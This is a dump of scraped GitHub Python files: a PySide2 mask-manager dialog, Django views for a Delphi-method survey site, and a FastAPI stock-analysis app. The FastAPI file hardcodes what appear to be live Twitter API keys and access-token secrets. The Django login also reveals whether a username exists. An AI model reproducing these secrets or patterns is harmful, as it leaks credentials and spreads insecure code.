Spock/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22276937606","text":"import os\nimport numpy as np\n\nfrom PySide2.QtCore import QObject, Signal\nfrom PySide2.QtWidgets import (\n QCheckBox, QFileDialog, QMenu, QPushButton, QTableWidgetItem)\nfrom PySide2.QtGui import QCursor\n\nfrom hexrd.ui import enter_key_filter\n\nfrom hexrd.ui.utils import create_unique_name\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.ui_loader import UiLoader\nfrom hexrd.ui.constants import ViewType\n\n\nclass MaskManagerDialog(QObject):\n\n # Emitted when masks are removed or visibility is toggled\n update_masks = Signal()\n\n def __init__(self, parent=None):\n super(MaskManagerDialog, self).__init__(parent)\n self.parent = parent\n\n loader = UiLoader()\n self.ui = loader.load_file('mask_manager_dialog.ui', parent)\n self.ui.installEventFilter(enter_key_filter)\n self.create_masks_list()\n self.threshold = False\n self.image_mode = ViewType.raw\n\n self.setup_connections()\n\n def show(self):\n self.setup_table()\n self.ui.show()\n\n def create_masks_list(self):\n self.masks = {}\n polar_data = HexrdConfig().polar_masks_line_data\n raw_data = HexrdConfig().raw_masks_line_data\n\n for i, (key, val) in enumerate(polar_data.items()):\n if not any(np.array_equal(m, val) for m in self.masks.values()):\n self.masks[key] = ('polar', val)\n for i, (key, val) in enumerate(raw_data.items()):\n if not any(np.array_equal(m, val) for m in self.masks.values()):\n self.masks[key] = val\n if HexrdConfig().threshold_mask_status:\n self.threshold = True\n self.masks['threshold'] = (\n 'threshold', HexrdConfig().threshold_mask)\n HexrdConfig().visible_masks = 
list(self.masks.keys())\n\n def update_masks_list(self, mask_type):\n if mask_type == 'polar':\n if not HexrdConfig().polar_masks_line_data:\n return\n for name, data in HexrdConfig().polar_masks_line_data.items():\n vals = self.masks.values()\n for val in data:\n if any(np.array_equal(val, m) for t, m in vals):\n continue\n self.masks[name] = (mask_type, val)\n elif mask_type == 'raw':\n if not HexrdConfig().raw_masks_line_data:\n return\n for name, value in HexrdConfig().raw_masks_line_data.items():\n det, val = value[0]\n vals = self.masks.values()\n if any(np.array_equal(val, m) for t, m in vals):\n continue\n self.masks[name] = (det, val)\n elif not self.threshold:\n name = create_unique_name(self.masks, 'threshold')\n self.masks[name] = ('threshold', HexrdConfig().threshold_mask)\n HexrdConfig().visible_masks.append(name)\n self.threshold = True\n self.setup_table()\n\n def setup_connections(self):\n self.ui.masks_table.cellDoubleClicked.connect(self.get_old_name)\n self.ui.masks_table.cellChanged.connect(self.update_mask_name)\n self.ui.masks_table.customContextMenuRequested.connect(\n self.context_menu_event)\n self.ui.export_masks.clicked.connect(self.export_visible_masks)\n HexrdConfig().mode_threshold_mask_changed.connect(\n self.update_masks_list)\n\n def setup_table(self, status=True):\n self.ui.masks_table.setRowCount(0)\n for i, key in enumerate(self.masks.keys()):\n # Add label\n self.ui.masks_table.insertRow(i)\n self.ui.masks_table.setItem(i, 0, QTableWidgetItem(key))\n\n # Add checkbox to toggle visibility\n cb = QCheckBox()\n status = key in HexrdConfig().visible_masks\n cb.setChecked(status)\n cb.setStyleSheet('margin-left:50%; margin-right:50%;')\n cb.toggled.connect(self.toggle_visibility)\n self.ui.masks_table.setCellWidget(i, 1, cb)\n\n # Add push button to remove mask\n pb = QPushButton('Remove Mask')\n pb.clicked.connect(self.remove_mask)\n self.ui.masks_table.setCellWidget(i, 2, pb)\n\n # Connect manager to raw image mode tab settings\n # for threshold mask\n mtype, data = self.masks[key]\n if mtype == 'threshold':\n self.setup_threshold_connections(cb, pb)\n\n def setup_threshold_connections(self, checkbox, pushbutton):\n HexrdConfig().mode_threshold_mask_changed.connect(checkbox.setChecked)\n checkbox.toggled.connect(self.threshold_toggled)\n\n def image_mode_changed(self, mode):\n self.image_mode = mode\n\n def threshold_toggled(self, v):\n HexrdConfig().set_threshold_mask_status(v, set_by_mgr=True)\n\n def toggle_visibility(self, checked):\n if self.ui.masks_table.currentRow() < 0:\n return\n\n row = self.ui.masks_table.currentRow()\n name = self.ui.masks_table.item(row, 0).text()\n mtype, data = self.masks[name]\n\n if checked and name and name not in HexrdConfig().visible_masks:\n HexrdConfig().visible_masks.append(name)\n elif not checked and name in HexrdConfig().visible_masks:\n HexrdConfig().visible_masks.remove(name)\n\n if self.image_mode == ViewType.polar:\n HexrdConfig().polar_masks_changed.emit()\n elif self.image_mode == ViewType.raw:\n HexrdConfig().raw_masks_changed.emit()\n\n def reset_threshold(self):\n self.threshold = False\n HexrdConfig().set_threshold_comparison(0)\n HexrdConfig().set_threshold_value(0.0)\n HexrdConfig().set_threshold_mask(None)\n HexrdConfig().set_threshold_mask_status(False)\n\n def remove_mask(self):\n row = self.ui.masks_table.currentRow()\n name = self.ui.masks_table.item(row, 0).text()\n mtype, data = self.masks[name]\n\n del self.masks[name]\n if name in HexrdConfig().visible_masks:\n 
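# keep the visibility list in sync before the mask data itself is dropped below\n            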
HexrdConfig().visible_masks.remove(name)\n HexrdConfig().polar_masks_line_data.pop(name, None)\n HexrdConfig().polar_masks.pop(name, None)\n HexrdConfig().raw_masks_line_data.pop(name, None)\n HexrdConfig().raw_masks.pop(name, None)\n if mtype == 'threshold':\n self.reset_threshold()\n\n self.ui.masks_table.removeRow(row)\n\n if self.image_mode == ViewType.polar:\n HexrdConfig().polar_masks_changed.emit()\n elif self.image_mode == ViewType.raw:\n HexrdConfig().raw_masks_changed.emit()\n\n def get_old_name(self, row, column):\n if column != 0:\n return\n\n self.old_name = self.ui.masks_table.item(row, 0).text()\n\n def update_mask_name(self, row, column):\n if not hasattr(self, 'old_name') or self.old_name is None:\n return\n\n new_name = self.ui.masks_table.item(row, 0).text()\n if self.old_name != new_name:\n if new_name in self.masks.keys():\n self.ui.masks_table.item(row, 0).setText(self.old_name)\n return\n\n self.masks[new_name] = self.masks.pop(self.old_name)\n mtype, data = self.masks[new_name]\n if mtype == 'polar':\n value = HexrdConfig().polar_masks_line_data.pop(self.old_name)\n HexrdConfig().polar_masks[new_name] = value\n elif mtype != 'threshold':\n value = HexrdConfig().raw_masks_line_data.pop(self.old_name)\n HexrdConfig().raw_masks[new_name] = value\n\n if self.old_name in HexrdConfig().polar_masks.keys():\n value = HexrdConfig().polar_masks.pop(self.old_name)\n HexrdConfig().polar_masks[new_name] = value\n if self.old_name in HexrdConfig().raw_masks.keys():\n value = HexrdConfig().raw_masks.pop(self.old_name)\n HexrdConfig().raw_masks[new_name] = value\n\n if self.old_name in self.visible:\n self.visible.append(new_name)\n self.visible.remove(self.old_name)\n self.old_name = None\n\n def context_menu_event(self, event):\n index = self.ui.masks_table.indexAt(event)\n menu = QMenu(self.ui.masks_table)\n export = menu.addAction('Export Mask')\n action = menu.exec_(QCursor.pos())\n if action == export:\n selection = self.ui.masks_table.item(index.row(), 0).text()\n mtype, data = self.masks[selection]\n self.export_masks({selection: data})\n\n def export_masks(self, data):\n selected_file, selected_filter = QFileDialog.getSaveFileName(\n self.ui, 'Save Mask', HexrdConfig().working_dir,\n 'NPZ files (*.npz);; NPY files (*.npy)')\n\n if selected_file:\n HexrdConfig().working_dir = os.path.dirname(selected_file)\n path, ext = os.path.splitext(selected_file)\n\n if ext.lower() == '.npz':\n np.savez(selected_file, **data)\n elif ext.lower() == '.npy':\n np.save(selected_file, list(data.values())[0])\n\n def export_visible_masks(self):\n d = {}\n for mask in HexrdConfig().visible_masks:\n mtype, data = self.masks[mask]\n d[mask] = data\n self.export_masks(d)\n","repo_name":"cjh1/hexrdgui","sub_path":"hexrd/ui/mask_manager_dialog.py","file_name":"mask_manager_dialog.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"15452684856","text":"from django.shortcuts import redirect, render\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .models import AnswerQuestion, AnswerSheet, Form, Question\nimport numpy as np\n\n\ndef loginPage(request):\n\n error_given = False\n\n if request.user.is_authenticated:\n return redirect('main')\n\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n try:\n user = 
User.objects.get(username=username)\n except:\n if error_given is False:\n messages.error(request, 'Username does not exist!')\n error_given = True\n\n user = auth.authenticate(request, username=username, password=password)\n\n if user is not None:\n auth.login(request, user)\n return redirect('main')\n else:\n if error_given is False:\n messages.error(request, 'Username or password is incorrect!')\n error_given = True\n\n return render(request, 'login.html')\n\n\ndef logoutPage(request):\n auth.logout(request)\n return redirect('login')\n\n\n@login_required(login_url='login')\ndef mainPage(request):\n\n forms = Form.objects.all()\n forms = sorted(forms, key=lambda x: x.type_id)\n completed = []\n\n for form in forms:\n if AnswerSheet.objects.filter(form=form).filter(user=request.user):\n completed.append(True)\n else:\n completed.append(False)\n\n return render(request, 'main.html', {'listOfArgs': zip(forms, completed)})\n\n\n@login_required(login_url='login')\ndef formPage(request, form_id):\n\n form = Form.objects.get(id=form_id)\n questions = list(Question.objects.filter(forms__id=form.id))\n questions = sorted(questions, key=lambda x: x.description)\n old_answers_user = []\n old_answers = []\n first_quartile = []\n median = []\n third_quartile = []\n iqr = []\n\n if AnswerSheet.objects.filter(form=form).filter(user=request.user):\n return redirect('main')\n\n if form.type_id != 1 and not AnswerSheet.objects.filter(form__type_id=form.type_id - 1).filter(user=request.user):\n return redirect('main')\n\n if form.type_id > 1:\n for i in questions:\n oldAnswerUser = AnswerQuestion.objects.filter(question=i).filter(\n answer_sheet__form__type_id=form.type_id - 1).filter(answer_sheet__user=request.user)\n if len(oldAnswerUser) == 0:\n old_answers_user.append('N/A')\n else:\n old_answers_user.append(oldAnswerUser[0].option)\n oldAnswer = AnswerQuestion.objects.filter(question=i).filter(\n answer_sheet__form__type_id=form.type_id - 1)\n old_answers.clear()\n for j in oldAnswer:\n old_answers.append(int(j.option))\n if len(old_answers) == 0:\n first_quartile.append('N/A')\n median.append('N/A')\n third_quartile.append('N/A')\n iqr.append('N/A')\n else:\n values = np.percentile(old_answers, [25, 50, 75])\n first_quartile.append(\"{:.2f}\".format(values[0]))\n median.append(\"{:.2f}\".format(values[1]))\n third_quartile.append(\"{:.2f}\".format(values[2]))\n iqr.append(\"{:.2f}\".format(values[2] - values[0]))\n else:\n for i in questions:\n old_answers_user.append('N/A')\n first_quartile.append('N/A')\n median.append('N/A')\n third_quartile.append('N/A')\n iqr.append('N/A')\n\n answers = []\n answerSheet = AnswerSheet(form=form, user=request.user)\n finished = False\n\n if request.method == 'POST':\n for i in questions:\n opt = request.POST.get(str(i.id), False)\n comment = request.POST.get(str(i.id) + \" comment\", \"\")\n if opt == False:\n messages.error(request, 'Please answer all the questions.')\n answers.clear()\n finished = False\n break\n else:\n answers.append(AnswerQuestion(\n option=opt, comment=comment, question=i, answer_sheet=answerSheet))\n finished = True\n\n if finished == True:\n answerSheet.save()\n for j in answers:\n j.save()\n return redirect('main')\n\n return render(request, 'form.html', {'form': form, 'listOfArgs': zip(questions, old_answers_user, first_quartile, median, third_quartile, iqr)})\n\n\n@login_required(login_url='login')\ndef statsPage(request):\n\n if not request.user.is_superuser:\n return redirect('main')\n\n forms_first = True\n for i in 
list(Form.objects.filter(type_id=1)):\n if i.visible == False:\n forms_first = False\n break\n if len(Form.objects.filter(type_id=1)) == 0:\n forms_first = False\n\n forms_second = True\n for i in list(Form.objects.filter(type_id=2)):\n if i.visible == False:\n forms_second = False\n break\n if len(Form.objects.filter(type_id=2)) == 0:\n forms_second = False\n\n forms_third = True\n for i in list(Form.objects.filter(type_id=3)):\n if i.visible == False:\n forms_third = False\n break\n if len(Form.objects.filter(type_id=3)) == 0:\n forms_third = False\n\n forms_fourth = True\n for i in list(Form.objects.filter(type_id=4)):\n if i.visible == False:\n forms_fourth = False\n break\n if len(Form.objects.filter(type_id=4)) == 0:\n forms_fourth = False\n\n forms_fifth = True\n for i in list(Form.objects.filter(type_id=5)):\n if i.visible == False:\n forms_fifth = False\n break\n if len(Form.objects.filter(type_id=5)) == 0:\n forms_fifth = False\n\n forms_sixth = True\n for i in list(Form.objects.filter(type_id=6)):\n if i.visible == False:\n forms_sixth = False\n break\n if len(Form.objects.filter(type_id=6)) == 0:\n forms_sixth = False\n\n users = list(User.objects.filter(is_superuser=False))\n users = sorted(users, key=lambda x: x.username)\n firsts = []\n seconds = []\n thirds = []\n fourths = []\n fifths = []\n sixths = []\n\n for i in users:\n if len(Form.objects.filter(type_id=1)) == 0:\n firsts.append(2)\n elif len(Form.objects.filter(type_id=1)) > len(AnswerSheet.objects.filter(form__type_id=1).filter(user=i)):\n firsts.append(1)\n else:\n firsts.append(0)\n\n if len(Form.objects.filter(type_id=2)) == 0:\n seconds.append(2)\n elif len(Form.objects.filter(type_id=2)) > len(AnswerSheet.objects.filter(form__type_id=2).filter(user=i)) or len(Form.objects.filter(type_id=2)) == 0:\n seconds.append(1)\n else:\n seconds.append(0)\n\n if len(Form.objects.filter(type_id=3)) == 0:\n thirds.append(2)\n elif len(Form.objects.filter(type_id=3)) > len(AnswerSheet.objects.filter(form__type_id=3).filter(user=i)) or len(Form.objects.filter(type_id=3)) == 0:\n thirds.append(1)\n else:\n thirds.append(0)\n\n if len(Form.objects.filter(type_id=4)) == 0:\n fourths.append(2)\n elif len(Form.objects.filter(type_id=4)) > len(AnswerSheet.objects.filter(form__type_id=4).filter(user=i)) or len(Form.objects.filter(type_id=4)) == 0:\n fourths.append(1)\n else:\n fourths.append(0)\n\n if len(Form.objects.filter(type_id=5)) == 0:\n fifths.append(2)\n elif len(Form.objects.filter(type_id=5)) > len(AnswerSheet.objects.filter(form__type_id=5).filter(user=i)) or len(Form.objects.filter(type_id=5)) == 0:\n fifths.append(1)\n else:\n fifths.append(0)\n\n if len(Form.objects.filter(type_id=6)) == 0:\n sixths.append(2)\n elif len(Form.objects.filter(type_id=6)) > len(AnswerSheet.objects.filter(form__type_id=6).filter(user=i)) or len(Form.objects.filter(type_id=6)) == 0:\n sixths.append(1)\n else:\n sixths.append(0)\n\n type_one = 2\n type_two = 2\n type_three = 2\n type_four = 2\n type_five = 2\n type_six = 2\n\n forms_one = Form.objects.filter(type_id=1)\n if len(forms_one) > 0:\n if forms_one[0].visible:\n type_one = 0\n else:\n type_one = 1\n\n forms_two = Form.objects.filter(type_id=2)\n if len(forms_two) > 0:\n if forms_two[0].visible:\n type_two = 0\n else:\n type_two = 1\n\n forms_three = Form.objects.filter(type_id=3)\n if len(forms_three) > 0:\n if forms_three[0].visible:\n type_three = 0\n else:\n type_three = 1\n\n forms_four = Form.objects.filter(type_id=4)\n if len(forms_four) > 0:\n if forms_four[0].visible:\n 
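# Status codes consumed by the template: 0 = forms open, 1 = closed, 2 = none exist.\n            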
type_four = 0\n else:\n type_four = 1\n\n forms_five = Form.objects.filter(type_id=5)\n if len(forms_five) > 0:\n if forms_five[0].visible:\n type_five = 0\n else:\n type_five = 1\n\n forms_six = Form.objects.filter(type_id=6)\n if len(forms_six) > 0:\n if forms_six[0].visible:\n type_six = 0\n else:\n type_six = 1\n\n return render(request, 'stats.html', {'forms_first': forms_first, 'forms_second': forms_second, 'forms_third': forms_third, 'forms_fourth': forms_fourth, 'forms_fifth': forms_fifth, 'forms_sixth': forms_sixth, 'type_one': type_one, 'type_two': type_two, 'type_three': type_three, 'type_four': type_four, 'type_five': type_five, 'type_six': type_six, 'listOfArgs': zip(users, firsts, seconds, thirds, fourths, fifths, sixths)})\n\n\n@login_required(login_url='login')\ndef formStatsPage(request, form_id):\n\n form = Form.objects.get(id=form_id)\n\n if not request.user.is_superuser:\n return redirect('main')\n\n if AnswerSheet.objects.filter(form=form).filter(user=request.user):\n return redirect('main')\n\n questions = list(Question.objects.filter(forms__id=form.id))\n questions = sorted(questions, key=lambda x: x.description)\n old_answers = []\n first_quartile = []\n median = []\n third_quartile = []\n iqr = []\n\n for i in questions:\n oldAnswer = AnswerQuestion.objects.filter(question=i).filter(\n answer_sheet__form__type_id=form.type_id)\n old_answers.clear()\n for j in oldAnswer:\n old_answers.append(int(j.option))\n if len(old_answers) == 0:\n first_quartile.append(\"N/A\")\n median.append(\"N/A\")\n third_quartile.append(\"N/A\")\n iqr.append(\"N/A\")\n else:\n values = np.percentile(old_answers, [25, 50, 75])\n first_quartile.append(\"{:.2f}\".format(values[0]))\n median.append(\"{:.2f}\".format(values[1]))\n third_quartile.append(\"{:.2f}\".format(values[2]))\n iqr.append(\"{:.2f}\".format(values[2] - values[0]))\n\n return render(request, 'formStats.html', {'form': form, 'listOfArgs': zip(questions, first_quartile, median, third_quartile, iqr)})\n\n\n@login_required(login_url='login')\ndef openFormsPage(request, type_id):\n\n if not request.user.is_superuser:\n return redirect('main')\n\n forms = Form.objects.filter(type_id=type_id)\n for form in forms:\n form.visible = True\n form.save()\n\n return redirect('stats')\n\n\n@login_required(login_url='login')\ndef closeFormsPage(request, type_id):\n\n if not request.user.is_superuser:\n return redirect('main')\n\n forms = Form.objects.filter(type_id=type_id)\n for form in forms:\n form.visible = False\n form.save()\n\n return redirect('stats')\n","repo_name":"acelikyurek/Delphi-Survey-Method-Project","sub_path":"form_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6115493111","text":"from fastapi import FastAPI, Request, Form, HTTPException\nimport sqlite3, config\nfrom fastapi.templating import Jinja2Templates\nfrom datetime import date\nimport datetime\nfrom fastapi.responses import RedirectResponse\nimport yfinance as yf\nimport pandas as pd\nfrom plotly import graph_objs as go \nfrom fastapi.responses import JSONResponse\nfrom statsmodels.tsa.stattools import adfuller\nimport tweepy\nfrom textblob import TextBlob\nimport statistics\nimport numpy as np\nfrom finvizfinance.quote import finvizfinance\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom textblob import TextBlob\n\n\n\n\napp = FastAPI()\ntemplates = 
Jinja2Templates(directory=\"templates\")\n\nconsumer_key='4hZQpGGEiaz1MGfpwl1ZkoKHs'\nconsumer_secret='m1M7DOOgJcGtvI87jIFgCcToYIwEeXZYZGVstp0fjJglFP2LXq'\naccess_token_key='493637502-Mk3univd84qV3w15PAdgELGldT3cWaQ5QvAPMmhB'\naccess_token_secret='4Bd2Dt4eW26fx1o2bn6F9M4rfFWhFG8qbdweYKnIl8kzC'\n\n@app.get(\"/\")\ndef index(request: Request):\n stock_filter = request.query_params.get('filter', False)\n\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n cursor = connection.cursor()\n\n if stock_filter == 'new_closing_highs':\n cursor.execute(\"\"\"\n select * from (\n select symbol, name, stock_id, max(close), date\n from stock_price join stock on stock.id = stock_price.stock_id\n group by stock_id\n order by symbol\n ) where date = (select max(date) from stock_price)\n \"\"\")\n elif stock_filter == 'new_closing_lows':\n cursor.execute(\"\"\"\n select * from (\n select symbol, name, stock_id, min(close), date\n from stock_price join stock on stock.id = stock_price.stock_id\n group by stock_id\n order by symbol\n ) where date = (select max(date) from stock_price)\n \"\"\")\n elif stock_filter == 'rsi_overbought':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where rsi_14 > 70\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n \n elif stock_filter == 'rsi_oversold':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where rsi_14 < 30\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n elif stock_filter == 'above_sma_20':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close > sma_20\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n elif stock_filter == 'below_sma_20':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close < sma_20\n AND date=(select max(date) from stock_price)\n order by symbol\n \"\"\")\n\n elif stock_filter == 'above_sma_50':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close > sma_50\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n elif stock_filter == 'below_sma_50':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close < sma_50\n AND date=(select max(date) from stock_price)\n order by symbol\n \"\"\")\n \n else:\n cursor.execute(\"\"\"\n SELECT id, symbol, name FROM stock ORDER BY symbol\n \"\"\")\n\n rows = cursor.fetchall()\n\n current_date = date.today().isoformat()\n\n cursor.execute(\"\"\"\n select symbol, rsi_14, sma_20, sma_50, close\n from stock join stock_price on stock_price.stock_id = stock.id\n where date = (select max(date) from stock_price)\n \"\"\")\n\n indicator_rows = cursor.fetchall()\n\n indicator_values = {}\n\n for row in indicator_rows:\n indicator_values[row['symbol']] = row\n\n return templates.TemplateResponse(\"index.html\", {\"request\": request, \"stocks\": rows, \"indicator_values\": indicator_values})\n\n@app.get(\"/stock/{symbol}\")\ndef stock_detail(request: Request, symbol):\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n cursor = 
connection.cursor()\n cursor.execute(\"\"\"\n SELECT * FROM strategy\n \"\"\")\n strategies = cursor.fetchall()\n\n cursor.execute(\"\"\"\n SELECT id, symbol, name FROM stock WHERE symbol = ?\n \"\"\",(symbol,))\n row = cursor.fetchone()\n cursor.execute(\"\"\"\n SELECT * FROM stock_price WHERE stock_id = ? ORDER BY date DESC\n \"\"\", (row['id'],))\n\n prices = cursor.fetchall()\n\n tickersearch = yf.Ticker(symbol)\n beta = tickersearch.info['beta']\n MarketCap = tickersearch.info['marketCap']\n Volume = tickersearch.info['volume']\n High52 = tickersearch.info['fiftyTwoWeekLow']\n Low52 = tickersearch.info['fiftyTwoWeekHigh']\n AverageVol = tickersearch.info['averageDailyVolume10Day']\n Trailpe = tickersearch.info['trailingPE']\n Forwardpe = tickersearch.info['forwardPE']\n sharesf = tickersearch.info['floatShares']\n sharesS = tickersearch.info['sharesShort']\n shortRatio = tickersearch.info['shortRatio']\n institutions = tickersearch.info['heldPercentInstitutions']\n ptob = tickersearch.info['priceToBook']\n peg = tickersearch.info['pegRatio']\n summary = tickersearch.info['longBusinessSummary']\n meanticker = yf.Ticker(symbol)\n meanticker_hist = meanticker.history(period=\"1y\")\n mean = statistics.mean(meanticker_hist['Close'])\n variance = statistics.variance(meanticker_hist['Close'])\n std = statistics.stdev(meanticker_hist['Close'])\n\n spy = yf.Ticker(\"SPY\")\n spy_hist = spy.history(period=\"1y\")\n spy_hist = spy_hist.pct_change()\n meanticker_histnew = meanticker_hist.pct_change()\n correlation = spy_hist['Close'].corr(meanticker_histnew['Close'])\n return templates.TemplateResponse(\"stock_detail.html\", {\"request\": request, \"stock\": row, \"bars\": prices, \"strategies\": strategies,\"betas\": beta,\"MC\": MarketCap,\"Volume\": Volume,\"High52\": High52,\n \"Low52\": Low52,\"Volume10day\": AverageVol,\"Trailpe\": Trailpe,\"Forwardpe\": Forwardpe,\"sharesf\": sharesf,\"sharesS\": sharesS,\"shortRatio\": shortRatio,\"Institutions\": institutions,\"ptob\": ptob,\"peg\": peg,\"summary\": summary,\"mean\": mean,\"variance\": variance,\"std\": std,\"correlation\": correlation})\n\n@app.post(\"/apply_strategy\")\ndef apply_strategy(strategy_id: int = Form(...), stock_id: int = Form(...)):\n connection = sqlite3.connect(config.DB_FILE)\n cursor = connection.cursor()\n\n cursor.execute(\"\"\"\n INSERT INTO stock_strategy (stock_id, strategy_id) VALUES (?, ?)\n \"\"\", (stock_id, strategy_id))\n\n connection.commit()\n\n return RedirectResponse(url=f\"/strategy/{strategy_id}\", status_code=303)\n\n@app.get(\"/orders\")\ndef orders(request: Request):\n return templates.TemplateResponse(\"orders.html\", {\"request\": request})\n\n@app.get(\"/strategies\")\ndef strategies(request: Request):\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n cursor = connection.cursor()\n\n cursor.execute(\"\"\"\n SELECT * FROM strategy\n \"\"\")\n strategies = cursor.fetchall()\n\n return templates.TemplateResponse(\"strategies.html\", {\"request\": request, \"strategies\": strategies})\n\n@app.get(\"/strategy/{strategy_id}\")\ndef strategy(request: Request,strategy_id):\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n\n cursor = connection.cursor()\n\n cursor.execute(\"\"\"\n SELECT id, name\n FROM strategy\n WHERE id = ?\n \"\"\", (strategy_id,))\n\n strategy = cursor.fetchone()\n\n cursor.execute(\"\"\"\n SELECT symbol, name\n FROM stock JOIN stock_strategy on stock_strategy.stock_id = stock.id\n WHERE strategy_id = ?\n 
\"\"\", (strategy_id,))\n\n    stocks = cursor.fetchall()\n\n    return templates.TemplateResponse(\"strategy.html\", {\"request\": request, \"stocks\": stocks, \"strategy\": strategy})\n\n@app.get(\"/wsb_tracker\")\ndef wsb(request: Request):\n    connection = sqlite3.connect(config.DB_FILE)\n    connection.row_factory = sqlite3.Row\n    cursor = connection.cursor()\n\n    cursor.execute(\"\"\"\n        select count(*) as num_mentions, stock_id, symbol,dt,stock.name\n        from mention join stock on stock.id = mention.stock_id\n        where dt between '2021-02-11T00:00:00' and '2021-02-11T23:59:59'\n        group by stock_id, symbol\n        order by num_mentions DESC;\n    \"\"\")\n    wsbs = cursor.fetchall()\n    \n    # psaw is not in the module-level imports; import it here so this route works\n    from psaw import PushshiftAPI\n    api = PushshiftAPI()\n\n    start_epoch=int(datetime.datetime(2021, 3, 17).timestamp())\n\n    submissions = list(api.search_submissions(after=start_epoch,subreddit='wallstreetbets',filter=['url','author','title','subreddit'], limit=25))\n\n    df = pd.DataFrame(submissions)\n\n    vader = SentimentIntensityAnalyzer()\n    scores = df['title'].apply(vader.polarity_scores).tolist()\n    scores_df = pd.DataFrame(scores)\n\n    df = df.join(scores_df, rsuffix='_right')\n    new_df = df[['title', 'compound']].copy()\n    new_df.rename(columns={ new_df.columns[1]: \"Sentiment Score\" }, inplace = True)\n    new_df.rename(columns={ new_df.columns[0]: \"Post\" }, inplace = True)\n    html2 = new_df.to_html(classes='ui striped table')\n\n    return templates.TemplateResponse(\"wsb_tracker.html\", {\"request\": request, \"wsbs\": wsbs,\"posts\": html2})\n\n@app.get('/prophet')\ndef read_form(request: Request):\n\n    return templates.TemplateResponse(\"prophet.html\", {\"request\": request})\n\n@app.post('/prophet')\ndef predict_species(request: Request):\n\n    \n    \n    return templates.TemplateResponse(\"prophet.html\", {\"request\": request})\n\n@app.get(\"/correlation\")\ndef correlation(request: Request):\n    tickerp1 = \"\"\n    tickerp2 = \"\"\n    \n    return templates.TemplateResponse(\"correlation.html\", {\"request\": request,\"tickerp1\": tickerp1,\"tickerp2\": tickerp2})\n\n@app.post(\"/correlation\")\ndef correlation_form(request: Request,ticker1: str = Form(...),ticker2: str = Form(...)):\n    tickerp1 = ticker1\n    tickerp2 = ticker2\n    corticker1 = yf.Ticker(tickerp1)\n    corticker2 = yf.Ticker(tickerp2)\n    corticker1_hist = corticker1.history(period=\"1y\")\n    corticker2_hist = corticker2.history(period=\"1y\")\n    corticker1_dataframe = corticker1_hist.pct_change()\n    corticker2_dataframe = corticker2_hist.pct_change()\n    correlation = corticker1_dataframe['Close'].corr(corticker2_dataframe['Close'])\n    return templates.TemplateResponse(\"correlation.html\", {\"request\": request,\"tickerp1\": tickerp1,\"tickerp2\": tickerp2,\"correlation\": correlation})\n\n@app.get(\"/stationary\")\ndef stationarity(request: Request):\n    stationaryticker = \"\"\n    return templates.TemplateResponse(\"stationarity.html\", {\"request\": request,\"stationaryticker\": stationaryticker})\n\n@app.post(\"/stationary\")\ndef stationarity_form(request: Request,sticker: str = Form(...)):\n    stationaryticker = sticker\n    stticker1 = yf.Ticker(stationaryticker)\n    stticker1_hist = stticker1.history(period=\"1y\")\n    data = adfuller(stticker1_hist['Close'])\n    adfstatistic = data[0]\n    pvalue = data[1]\n    criticalvalue1 = data[4]['1%']\n    criticalvalue5 = data[4]['5%']\n    criticalvalue10 = data[4]['10%']\n    return templates.TemplateResponse(\"stationarity.html\", {\"request\": request,\"stationaryticker\": 
stationaryticker,\"adfstatistic\":adfstatistic,\"pvalue\":pvalue,\"criticalvalue1\":criticalvalue1,\"criticalvalue5\":criticalvalue5,\"criticalvalue10\":criticalvalue10})\n\n@app.get(\"/sentiment\")\ndef sentiment(request: Request):\n sentimenttickers = \"\"\n return templates.TemplateResponse(\"sentiment.html\", {\"request\": request,\"sentimenttickers\": sentimenttickers})\n\n@app.post(\"/sentiment\")\ndef sentiment_form(request: Request,sentimentticker: str = Form(...)):\n sentimenttickers = sentimentticker\n stock = finvizfinance(sentimenttickers)\n news_df = stock.TickerNews()\n news_df.style.set_properties(**{'text-align': 'left'})\n html = news_df.to_html(classes='ui striped table')\n vader = SentimentIntensityAnalyzer()\n scores = news_df['Title'].apply(vader.polarity_scores).tolist()\n scores_df = pd.DataFrame(scores)\n news_df = news_df.join(scores_df, rsuffix='_right')\n news_df['Date'] = pd.to_datetime(news_df.Date).dt.date\n mean_scores = news_df.groupby(['Date']).mean()\n mean_scores = mean_scores.unstack()\n mean_scores = mean_scores.xs('compound').transpose()\n mean_scores = mean_scores.to_frame()\n mean_scores = mean_scores.reset_index()\n mean_scores.rename(columns={ mean_scores.columns[1]: \"Sentiment Score\" }, inplace = True)\n html2 = mean_scores.to_html(classes='ui striped table')\n dates = mean_scores['Date']\n scores = list(mean_scores['Sentiment Score'])\n return templates.TemplateResponse(\"sentiment.html\", {\"request\": 